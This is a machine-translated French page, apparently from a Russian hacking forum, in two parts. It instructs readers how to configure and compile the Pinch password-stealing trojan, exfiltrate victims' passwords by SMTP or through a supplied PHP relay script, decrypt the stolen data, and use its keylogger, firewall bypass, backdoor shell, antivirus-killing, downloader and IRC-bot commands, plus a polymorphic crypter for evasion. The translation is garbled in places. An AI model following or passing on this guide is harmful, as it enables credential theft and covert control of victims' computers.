This page has been robot translated, sorry for typos if any. Original content here.

Nous cassons le savon, utilisons BrutusAET2


LE MATÉRIEL EST PUBLIÉ DANS LA FAMILIARISATION. L'AUTEUR N'A AUCUNE RESPONSABILITÉ


-------------------------------------------------- ----------------
partie 1. ancienne, mais utile. pour pincer 1

***********************
Pinch Instruction 1.0
***********************

=====
Intro
=====

S'il vous plaît ne soyez pas surpris que j'ai décidé d'écrire un tel article (article pour lamerzzz). Le fait est que sur mon forum (http://forum.web-hack.ru) environ une fois tous les trois jours un thème est créé, comme "Comment configurer correctement et utiliser Pinch?", "Comment utiliser Pinch?" et ainsi de suite.

===========
Caractéristiques
===========

Ce cheval de Troie est devenu très répandu en 2003/2004. Tout cela grâce à la possibilité de voler un grand nombre de mots de passe (ICQ99b-2003a / Lite / ICQ2003Pro, Miranda IM, Trillian ICQ et AIM, & RQ, The Bat!, Outlook Express Outlook, IE autocomplete & sites protégés & ftp (9x / ME / 2000 / XP), FAR Manager (ftp), Win / Total Commander (ftp), RAS (9x / Me / 2k / xp pris en charge)), petit poids, open source et création facile d'un troy pour une tâche spécifique. Troyan a les options suivantes:

- Envoyer la configuration de l'ordinateur de la victime: système d'exploitation, opérations, CPU, disque dur, utilisateur connecté, nom d'hôte, IP
- Espion du clavier (Key-log)
- Console distante
- Ignorer le pare-feu
- Envoi de tous les mots de passe à E-mail en utilisant un serveur SMTP
- Cryptage des mots de passe volés envoyés par courrier
- Auto-suppression de Troie après le lancement
- Rapports HTML / Texte
- La taille du fichier est d'environ 10 Ko
- Système modulaire
- Et bien plus encore ...

Troyan a écrit coban2k (http://www.cobans.net) - une personne assez connue dans le monde de ICQ-piratage. En raison de problèmes avec l'hébergement sur le stockage du cheval de Troie sur leur serveur, l'auteur a été forcé de supprimer cette création de son site Web. Malheureusement, presque tous les antivirus trouvent ce triple et il ne peut être vparit à la victime, qui n'a pas d'antivirus.

============
Contenu du paquet
============

Les dossiers et fichiers suivants sont inclus dans l'archive (pinch_1.0.zip) avec le trojan:

\ PinchBuilder.exe - Assistant de création de chevaux de Troie
\ Parser.exe - programme de décryptage des e-mails cryptés avec des mots de passe
\ readme.txt - aucun commentaire
\ Pinch \ - dossier principal avec asm-sources du cheval de Troie et le compilateur
\ Sources \ - autres sources
\ TB! 2 Plugin (Auto-parser) \ - dossier avec un plug-in pour The Bat 2!, Qui décode les e-mails cryptés avec des mots de passe venant dans votre boîte aux lettres
\ Sources \ Script \ - PHP-script, à travers lequel les mots de passe sont envoyés lors de la sélection de l'option appropriée lors de la compilation (lire plus loin)

================
Compiler le triple
================

Le kit est livré avec un assistant spécial (PinchBuilder.exe), qui est impliqué dans la création d'un cheval de Troie pour vos besoins et la compilation du cheval de Troie directement sur votre ordinateur. Le programme comporte deux onglets principaux: Compiler et Décrypter. Le premier est utilisé pour créer un cheval de Troie, et le second est utilisé pour déchiffrer les mots de passe (en fait, cet onglet est le résultat de l'opération du fichier Parser.exe). Ensuite, il y a trois sous-onglets: SMTP, HTTP et FILE. Ils ont la possibilité de sortir des mots de passe. Analysons chacun plus en détail:

========
SMTP
========

Dans le champ Serveur, entrez l'adresse (nom d'hôte / ip) du serveur SMTP. Si vous êtes entré dans le domaine du serveur, cliquez sur Résoudre pour que le domaine du serveur ressemble à une adresse IP. Ensuite, dans les champs From et To, spécifiez votre propre savon. Le bouton Envoyer un massage de test est utilisé pour l'envoi du courrier test, via les paramètres spécifiés. Je vous recommande fortement de l'utiliser. Si la lettre ne vient pas, cela signifie qu'il y a quelques problèmes avec l'envoi (pare-feu inclus, mauvais SMTP, n'a pas cliqué sur Résoudre, etc.).

Je tiens à noter que, récemment, la plupart des fournisseurs se tournent vers un système par lequel leurs clients peuvent envoyer des lettres uniquement à partir de leur serveur SMTP. Dans ce cas, je recommande d'utiliser la méthode d'envoi de lettres via HTTP.

====
HTTP
====

Nous téléchargeons le fichier \ Sources \ Script \ view.php sur le serveur supportant les scripts PHP et exécutons la fonction mail (). Ensuite, dans le champ URL, spécifiez le chemin d'accès à ce script (par exemple, http://www.xss.ru/pinch.php). Dans le champ Objet, spécifiez le nom du sujet avec lequel les messages seront récupérés. Dans le champ Contrôle de statut str, il doit y avoir une ligne, qui est émise par le script après son chargement. Dans le script fourni avec le troy, il a une valeur: _ret_ok_1:

<langage de script = "JavaScript">
window.status = "_ ret_ok_1";
</ script>

Si cette valeur n'est pas acceptée par le cheval de Troie, il essaiera d'envoyer un message à travers ce script toutes les minutes jusqu'à ce qu'il reçoive une chaîne du champ str de vérification d'état. Je recommande que vous utilisiez le script pas de la livraison standard, mais écrit par moi:

<html> <corps>
<? php
// Auteur: Terabyte (http://www.web-hack.ru)
$ email = $ _ POST ['a'];
$ subject = $ _ POST ['b'];
$ msg = $ _ POST ['c'];
if (isset ($ email) et isset ($ sujet) et isset ($ msg)) {
mail ($ email, $ sujet, $ msg, "De: $ email");}
?>
<langage de script = "JavaScript">
window.status = "_ ret_ok_1";
</ script>
</ body> </ html>

Il fait presque la même chose, mais il est plus compétent écrit. Un avantage énorme lors de l'utilisation de cette méthode d'envoi de mots de passe est le fait qu'il vous permet d'envoyer des mots de passe en contournant le pare-feu. Comment cela est-il réalisé? Voici un extrait du journal de l'avant-poste lorsque vous envoyez le mot de passe via le script de mon site:

Nom du processus: iexplorer.exe
Protocole: HTTP
Adresse à distance: www.web-hack.ru

Je pense que tout le monde a compris qui n'est pas dans le réservoir =) Aussi, je peux mettre en évidence la possibilité d'écrire des lettres cryptées sur votre site, et ne pas les envoyer au savon; la possibilité de changer le savon auquel les mots de passe sont envoyés, au cas où il serait effacé; avec l'envoi massif du troy (de sorte que les mots de passe peuvent être envoyés même à partir de ces fournisseurs où l'accès à tous les serveurs SMTP sauf pour eux est désactivé)

====
FICHIER
====

Cet onglet définit le chemin d'accès au fichier dans lequel tous les mots de passe sont enregistrés. Pour ce faire, dans le champ Chemin, écrivez le chemin d'accès au fichier (par exemple, C: \ password.txt).

================
Options du compilateur
================

Dans ce domaine, tout est clair, il suffit de cocher les cases où vous en avez besoin. Il faut faire attention au champ Ajouter Icône. Il indique le chemin vers l'icône à partir de laquelle le cheval de Troie compilé sera affiché. Je tiens à noter que sur mon système (Windows XP) je n'ai pas pu compiler le cheval de Troie avec cette option activée et il a dû être désactivé.

Dans les champs Protocole, spécifiez la méthode d'envoi des mots de passe (SMTP / HTTP / FILE). Ensuite, cliquez sur le bouton Compiler et allez compiler le cheval de Troie, qui sera sauvegardé dans le dossier principal avec l'assistant pour le créer.

=================
Déchiffrer les mots de passe
=================

Supposons que vous puissiez vider Lamer ce triple et vous sur le savon est venu des mots de passe de la voiture de la victime. Le fait est que lors de l'envoi, les mots de passe sont cryptés et doivent d'abord être déchiffrés (si vous n'avez pas de plug-in spécial à TheBat !, décrit ci-dessus). Copiez le texte avec des mots de passe cryptés dans le presse-papiers, ouvrez Parser.exe (ou l'onglet Decrypt dans PinchBuilder.exe) et cliquez sur l'élément Process Data dans le menu contextuel (ou appuyez simplement sur Alt + C). Ensuite, le programme vous donnera toutes les données volées à la victime avec un formulaire pratique. Ensuite, vous pouvez les enregistrer ou les imprimer.

==========
Conclusion
==========

Je tiens à vous avertir que lorsque vous utilisez ce cheval de Troie, vous tombez immédiatement sous l'article 273 du Code pénal de la Fédération de Russie et que vous pouvez être sévèrement puni ;-) Je (l'auteur de l'article) ne porte aucune responsabilité pour le préjudice causé à certaines personnes.


----------------------------------------

partie 2. instruction pour pincer 2.58

Un petit article sur la configuration élémentaire de la pincée. Ne jugez pas strictement, mais critiquez dans toute votre bouche. Article sur la mise en place de Pinch 2.58.

Je pense qu'avec des problèmes de crack-ohms il n'y a pas de niukava, car il y a une aide détaillée et même une vidéo jointe. Je veux vous montrer comment configurer un trois dans Builder:

Propriétés SMTP
Serveur (vous entrez, dans votre cas smtp.mail.ru), alors vous devez nécessairement appuyer sur Resolve pour qu'il se transforme en IP (d'ailleurs, toute la fraude doit être faite avec l'Internet connecté)

Port - laissez-le tel qu'il est

Protocole - le choix de la façon dont le rapport sera reçu, par SMTP, HTTP (via php) et FILE - stocké sur l'ordinateur. Les mêmes boutons (SMTP, HTTP, FILE) configurent les protocoles, mais dans ce cas nous nous intéressons au SMTP et nous l'avons déjà configuré.

Le bouton TestSend envoie un message de test au courrier.

L'onglet PWD -présente les mots de passe des programmes listés. L'élément ENABLE PWD ne contiendra aucun mot de passe lorsque le daw est supprimé.
N'envoyez pas de vieux rapports - n'envoyez pas d'anciens rapports.
Gryki Encrypt et Packing sont interconnectés. FSG, UPX, MEW sélection de la méthode d'emballage.

RUN onglet - sélectionnez les méthodes d'exécution automatique. Je pense que vous le réglerez. Pour commencer comme .... standart, DLL, Undelate Service. Allez dans le dossier ..... ou spécifiez ou choisissez l'un des systèmes. A droite, la colonne Values ​​je ne l'ai pas touchée et pour être honnête j'imagine vaguement pourquoi. En bas à droite - contourner le pare-feu Windows (SP2) - contourner le pare-feu du système dans SP2 (dans la mesure où je sais que le mécanisme de cet élément est il commence comme iexplorer.exe)

L'onglet SPY - quelques rapports supplémentaires - cela n'a pas fonctionné pour moi. Le point d'espion de l'écran prend une capture d'écran, mais encore une fois ça ne marche pas pour moi (srkin a été envoyé, mais il était vide)

L'onglet NET - Je ne l'ai pas utilisé. Il est conçu pour:
1. Ouvrez n'importe quel port sur l'ordinateur infecté et, par conséquent, accédez-y (ne tenez pas compte de cette utilisation, si vous ne le cryptez pas, si vous êtes pris, vous devinez vous-même ce qui va arriver ...)
2. Téléchargeur - spécifiez un lien direct vers un fichier qui devrait être téléchargé et exécuté (estimez les coûts que votre ennemi encourt s'il a du trafic ......)))
3. AutoUpdate - mise à jour automatique - trois, après le travail est terminé, il télécharge sa copie, puis il est auto-destructeur et le prochain chargement du système, une nouvelle copie est lancée (c'est pour la fiabilité afin qu'il ne puisse être trouvé.

BD (backdoor) onglet - la console ouvre le shell sur le port sélectionné, le contrôle telnet (telnet.exe) ou d'autres programmes. (Je ne l'ai pas moi-même essayé)

L'onglet ECT - collage avec n'importe quel fichier, ainsi que le réglage de l'icône ... Vous pouvez également faire cela, le message apparaît ... Mais quelque chose ne fonctionne pas ...

L'onglet KILL est la suppression de tout processus (vous pouvez essayer de tuer l'antivirus), par exemple "spidernt" - et le moniteur DrWEB s'éteint (je vous préviens, je ne l'ai pas encore donné, mais je vais l'essayer)

Onglet IE - définissez votre page d'accueil pour le navigateur. Ajouter une page aux Favoris ....

L'onglet WORM - sho zet taeke, je ne sais pas ... .....

IRC-bot onglet - accès à l'ordinateur via IRC:
autorisation .login
.die - fermer le bot
.download - Sauter le fichier de l'URL
.httpd - ouvrir l'accès au fichier via http sur un port spécifique
.killthread - achèvement d'une tâche spécifique
.proxy - ouvre les sox4 sur le port sélectionné avec l'identifiant sélectionné
.raw - envoi de texte brut à ce serveur irc
.remove - auto-suppression
.restart - redémarre
.run - exécute les commandes
.scan - analyse des adresses IP sur certains ports ouverts
.shell - ouverture du shell sur un port spécifique (pas en 95/98 / ME)
.status - afficher la version, IP, date de début
.threads - affiche les tâches actives
.update - bot de mise à jour automatique à partir d'une URL spéciale
.visit - visite l'URL sélectionnée cachée
.url - visite l'URL sélectionnée ouvertement
.link - ajouter aux favoris
.sp - crée ta page d'accueil
.msg - boîte aux lettres

Cela semble être tout .... Vous appuyez sur COMPILE et vous avez un dossier dans le dossier avec le constructeur ...

BONNE CHANCE !!!!!

Post-scriptum Ceci, comme, tout est écrit pour examen et l'auteur ne porte aucune responsabilité pour les conséquences ...



~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Caractéristiques de Crypt:
Utilisé un cryptor polymorphe
Contournement de KIS et Outpost (y compris les dernières versions)
Auto-enlèvement
Réduire la taille (le pincement normal diminue de 3-6kb, le chargeur zupacha de 60-80kb)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~